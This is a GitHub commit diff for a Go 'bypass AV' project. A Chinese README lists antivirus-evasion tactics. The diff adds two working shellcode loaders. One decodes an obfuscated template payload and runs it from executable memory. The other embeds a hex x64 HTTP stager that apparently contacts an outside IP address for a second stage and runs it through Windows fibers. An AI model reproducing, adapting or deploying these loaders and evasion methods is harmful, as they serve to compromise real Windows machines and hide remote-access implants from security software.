CreateFiber

forever-sky · Aug 23, 2021 · f4c7049 · f4c7049
1 parent d836ae9
commit f4c7049
Show file tree

Hide file tree

Showing 7 changed files with 472 additions and 10 deletions.
diff --git a/README.md b/README.md
@@ -5,13 +5,27 @@
 免杀这块本来就不是web狗擅长的，而且作为一个web狗也没必要花太多时间来折腾这个，达到能用就行，不要追求全部免杀，能免杀目标就行。
 
 
-## 思路
+## 免杀思路
+### 静态
 静态免杀比较简单，可选加密payload或者分离payload。  
-分离免杀效果比加密payload的效果要好。
-初次之外还可以考虑如下方式：   
-由于要引入net包，导致文件大小比较大。我不做测试了。   
+核心：把特征去除即可过静态，某些杀毒软件带沙箱，还需要考虑反沙箱。   
+除此之外还可以考虑如下方式：     
+由于要引入net包，导致文件大小比较大。我不做测试了。    
 把payload分离远程服务器   
-把payload隐写到图片    
+把payload隐写到图片     
+总之就是各种分离  
+
+### 动态
+golang和c++有点不一样不需要考虑处理IAT。    
+敏感api越少越好比如注册表操作、添加启动项、添加服务、添加用户、注入、劫持、创建进程、加载DLL等等    
+核心：   
+想法设法的把shellcode加载到内存里面。    
+使用内核层面Zw系列的API，绕过杀软对应用层的hook监控。  
+敏感操作可以分步进行，如申请内存先申请读写，再改成可以执行。不要一来就直接申请读写执行的内存。  
+
+
+
+
 
 ## 说明
 test1、test2效果还可以。
@@ -30,13 +44,17 @@ go build -ldflags="-s -w" -o main1.exe
 
 go build -ldflags="-s -w -H=windowsgui" -o main2.exe
 
+set GOOS=windows GOARCH=amd64;go build -o main.exe
+
+
 ```
 
 
 
 ## 参考
-https://github.com/Rvn0xsy/BadCode
-https://github.com/Airboi/bypass-av-note
-https://github.com/brimstone/go-shellcode        
-https://github.com/timwhitez/Doge-Loader        
-https://github.com/fcre1938/goShellCodeByPassVT        
+https://github.com/Ne0nd0g/go-shellcode   
+https://github.com/Rvn0xsy/BadCode    
+https://github.com/Airboi/bypass-av-note  
+https://github.com/brimstone/go-shellcode          
+https://github.com/timwhitez/Doge-Loader          
+https://github.com/fcre1938/goShellCodeByPassVT          
diff --git a/gen/genExe b/gen/genExe
@@ -0,0 +1,75 @@
+package main
+
+import (
+	"encoding/base64"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var kk = []byte{0x23, 0x32}
+
+
+
+
+var (
+	kernel32      = syscall.MustLoadDLL("kernel32.dll")
+	ntdll         = syscall.MustLoadDLL("ntdll.dll")
+	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
+	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
+)
+
+func getDeCode(string2 string) []byte {
+
+	ss, _ := base64.StdEncoding.DecodeString(string2)
+	string2 = string(ss)
+	var shellcode []byte
+
+	bydata := []byte(string2)
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]-kk[0]+kk[1])
+	}
+	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+	return ssb
+
+}
+
+
+
+func genEXE(charcode []byte) {
+
+	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	if err != nil && err.Error() != "The operation completed successfully." {
+		syscall.Exit(0)
+	}
+	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+	if err != nil && err.Error() != "The operation completed successfully." {
+		syscall.Exit(0)
+	}
+	time.Sleep(5 * time.Second)
+	syscall.Syscall(addr, 0, 0, 0, 0)
+}
+
+func gd() int64 {
+	time.Sleep(time.Duration(2) * time.Second)
+
+	dd := time.Now().UTC().UnixNano()
+	return dd + 123456
+
+}
+
+
+
+func main() {
+	bbdata := "${bdata}"
+	shellCodeHex := getDeCode(bbdata)
+	gd()
+	genEXE(shellCodeHex)
+}
diff --git a/go.mod b/go.mod
@@ -1,3 +1,9 @@
 module GolangBypassAV
 
 go 1.16
+
+require (
+	github.com/fatih/color v1.12.0
+	golang.org/x/crypto v0.0.0-20210817164053-32db794688a5
+	golang.org/x/sys v0.0.0-20210823070655-63515b42dcdf
+)
diff --git a/new/createFiber/README.md b/new/createFiber/README.md
@@ -0,0 +1,5 @@
+
+
+
+
+![](img.png)
diff --git a/new/createFiber/img.png b/new/createFiber/img.png
diff --git a/new/createFiber/main.go b/new/createFiber/main.go
@@ -0,0 +1,47 @@
+package main
+
+import (
+	"encoding/hex"
+	"golang.org/x/sys/windows"
+	"unsafe"
+)
+
+const (
+	MEM_COMMIT        = 0x1000
+	MEM_RESERVE       = 0x2000
+	PAGE_EXECUTE_READ = 0x20
+	PAGE_READWRITE    = 0x04
+)
+
+func main() {
+
+	shellcode, _ := hex.DecodeString("fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b8a81b00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f6a71756572792d332e332e322e736c696d2e6d696e2e6a7300cdb0a00ec2dc91895f1f56a0da0e7f210c98ce3529b62f33fd5dcb6aab972993ab94d167002577398fb9a65ab39b023f637e8c344f004163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c2a2f2a3b713d302e380d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e350d0a526566657265723a20687474703a2f2f636f64652e6a71756572792e636f6d2f0d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e5420362e333b2054726964656e742f372e303b2072763a31312e3029206c696b65204765636b6f0d0a0055c7a0ba42b85cdec6b2caca44fee4156bdedf10a01d0e4eedbc96136d5c6ce2ba85860fadaeb8c6281c980ed40890d09b9e3bf82ed7130041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d75858584805af0f000050c3e89ffdffff32302e3139372e3139342e38350012345678")
+
+	kernel32 := windows.NewLazySystemDLL("kernel32.dll")
+	ntdll := windows.NewLazySystemDLL("ntdll.dll")
+
+	VirtualAlloc := kernel32.NewProc("VirtualAlloc")
+	VirtualProtect := kernel32.NewProc("VirtualProtect")
+	RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
+	ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber")
+	CreateFiber := kernel32.NewProc("CreateFiber")
+	SwitchToFiber := kernel32.NewProc("SwitchToFiber")
+
+	fiberAddr, _, _ := ConvertThreadToFiber.Call()
+
+	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
+
+	if addr == 0 {
+		panic(1)
+	}
+
+	RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
+
+	oldProtect := PAGE_READWRITE
+	VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
+	fiber, _, _ := CreateFiber.Call(0, addr, 0)
+
+	SwitchToFiber.Call(fiber)
+	SwitchToFiber.Call(fiberAddr)
+
+}